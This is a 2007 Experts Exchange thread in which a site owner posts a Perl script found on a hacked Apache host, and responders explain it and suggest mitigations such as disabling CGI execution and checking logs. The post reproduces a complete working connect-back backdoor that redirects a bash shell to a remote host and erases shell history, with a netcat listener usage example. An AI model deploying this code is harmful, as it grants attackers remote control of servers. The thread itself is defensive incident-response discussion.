Solved

Site hacked - Linux/Apache... Perl script involved?

Posted on 2007-03-28
6
515 Views
Last Modified: 2012-06-27
Site hacked last Sunday. I changed the password a few times but somehow they got back in on Tuesday. Has been quiet for 24 hours now. I completely changed the password, wiped out all files in the directory, and re-uploaded clean files. Other than a few modified HTML pages, I found the Perl script listed below. I can't read Perl, can anyone make any sense of this? Does it give any clues as to how they got in? Hosting company has been less than helpful, unfortunately.

Thanks,
-Brad

---------------------------------------------------------------------------------------------

#!/usr/bin/perl
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell          
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                          
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system      = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
0
Comment
Question by:bbdesign
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
  • 2
6 Comments
 
LVL 1

Accepted Solution

by:
the__tyrant earned 500 total points
ID: 18810637
Looks like they somehow manage to upload this to your site - do you have any file uploads in any of your html pages?  if so do those directories allow the execution of perl scripts?  Could we get a bit more info about the setup of your server/site - like does it allow shell accounts?

Seems as though they are sending back a bash shell through netcat (nc -vv -l -p 2121)
netcat: http://netcat.sourceforge.net/

Tell your service provider to turn off perl/cgi scripts in the apache config, unless you need them, and if you do, only allow scripts to be run out of the cgi-bin. (and if you do have an upload file script, make it upload to a directory other than cgi-bin)
0
 

Author Comment

by:bbdesign
ID: 18810705
No file uploads in the PHP pages.

I believe the only interactivity is the contact form. Would that be affected if I turn off perl/cgi scripts? Definitely no file upload scripts, though.

If that isn't the case, not sure how they would have gotten the file there, other than by knowing the username/password. This was a brand new hosting account, brand new IP, etc. Was only up for a few days.

I'll check with the hosting provider on some of the other items you mention.

Thanks.
0
 
LVL 1

Expert Comment

by:the__tyrant
ID: 18810854
Well if you've got only php scripts and no perl scripts anywhere, then nothing would be effected.   Not exactly sure...could the username/password be easily cracked? (does the password have special chars like ! or : or whatver else as well as numbers?)

the hosting provider should be worried about this since they are gaining access to a server controlled by them - ask them for the system logs pertaining to your site/user maybe, might shed some more light on how they are getting the script on the server.
0
To Patch or not to Patch? That is the question!

Don't get caught out like thousands of others around the world in the recent Ransomware Fiasco!
Discuss..
- Why it's not a good idea to wait before Patching
- Sensible approaches to Patching discussed
- Add your feedback, comments and suggestions

 

Author Comment

by:bbdesign
ID: 18810898
Password is pretty secure. Like I said, this was a brand new account, in within 48 hours it was hacked.

Hosting provider is surprisingly less worried than I thought they would be. Have to break through their first line of tech support, probably.

Thanks for your help.
0
 
LVL 1

Expert Comment

by:the__tyrant
ID: 18810973
Hopefully it gets solved, but in any case i think the best bet would to get the provider to stop disable perl execution on any of your web exposed directories.

Cheers, and good luck with tech support ;)
0
 
LVL 39

Expert Comment

by:Adam314
ID: 18811823
You can probably get the access logs - most hosting providers will give those to you.  Look through this for anything suspicious.

0

Featured Post

Create Professional Looking Email Signatures

Create "Professional HTML Email Signatures" with ease.
7 Day Money Back Guarantee if not 100% Satisfied.
Affordable - Try it out for 7 Days Totally Risk Free.
Installers provided for over 45 Email clients.
Both Windows & MAC Supported.
Highly Recommended!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Ways to scan an IIS if 'directory browsing' has been disabled 3 161
Perl script to delete older files 6 100
Apache module 5 87
make a default program in ubuntu 6 24
SHARE your personal details only on a NEED to basis. Take CHARGE and SECURE your IDENTITY. How do I then PROTECT myself and stay in charge of my own Personal details (and) - MY own WAY...
Envision that you are chipping away at another e-business site with a team of pundit developers and designers. Everything seems, by all accounts, to be going easily.
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…

738 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question